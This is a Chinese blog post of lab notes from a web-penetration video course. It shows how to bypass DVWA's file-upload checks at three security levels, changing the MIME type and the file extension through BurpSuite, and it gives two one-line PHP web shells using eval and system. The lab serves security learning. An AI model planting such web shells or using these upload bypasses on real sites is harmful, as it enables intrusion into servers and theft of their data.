赞
踩
学习视频来源:B站《Web安全渗透全套教程(40集)》
个人在学习的同时,也验证了视频中的实验部分,现将授课笔记和实验笔记整理下来。
目标靶机:OWASP_Broken_Web_Apps_VM_1.2,用户名/密码:root/owaspwba
测试渗透机:Kali-Linux-2018.2-vm-amd64,用户名/密码:root/toor
(2个虚拟机可通过baidu搜索下载,有需要的小伙伴可私信我)
渗透机开启ssh服务(默认无法通过SecureCRT登录)
- service ssh
- systemctl enable ssh
- systemctl status ssh
验证服务正常启动
(1):通过浏览器访问172.16.190.198(小伙伴们的虚机通过NAT获取的IP地址应该是其他地址)
(2):点击登录Damn Vulnerable Web Application时用户名/密码:admin/admin
(3):此处查看到当前安全级别为Low
(4):选择任意类型文件上传(非图像文件)
(5):上传成功
(6):查看Low级别下php源码
(1):调整安全级别为medium
(2):查看Medium级别下php源码,其对mime类型进行了校验
(3):无法上传非图像文件
(4):下载并使用该软件
(5):BurpSuite代理工作原理
(6):Kali虚拟机设置代理服务器
(7):点击Kali虚机中的BurpSuite,创建空项目
(8):使用默认参数,点击Start Burp
(9):默认代理功能开启
(10):如果希望外部主机的浏览器也需使用代理,则需要开启所有接口的监听
(11):浏览器上传文件时,并不会直接成功,点击Forward才会成功
(12):上传php文件,但修改Content-type为image/jpeg
(13):修改完毕后再点击Forward即可上传
(14):绕过medium中级安全防护,上传成功
(1):修改级别为High
(2):查看源码为限制了文件的后缀名
(3):上传php文件无法上传
(4):可用代理拦截,修改文件后缀名,点击Forward
(5):文件就可以成功上传
小马:一句话木马也称为小马,即整个shell代码量只有一行,一般是系统执行函数
大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到
(1):编写shell2.php,并成功上传,其中内容为<?php eval($_REQUEST['guol']);?>
(2):在浏览器输入文件路径及参数,可以查看php信息
(3):编写shell3.php,并成功上传,其中内容为<?php system($_REQUEST['guol']);?>
(4):在浏览器输入文件路径及参数,可以查看linux系统用户名和密码
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。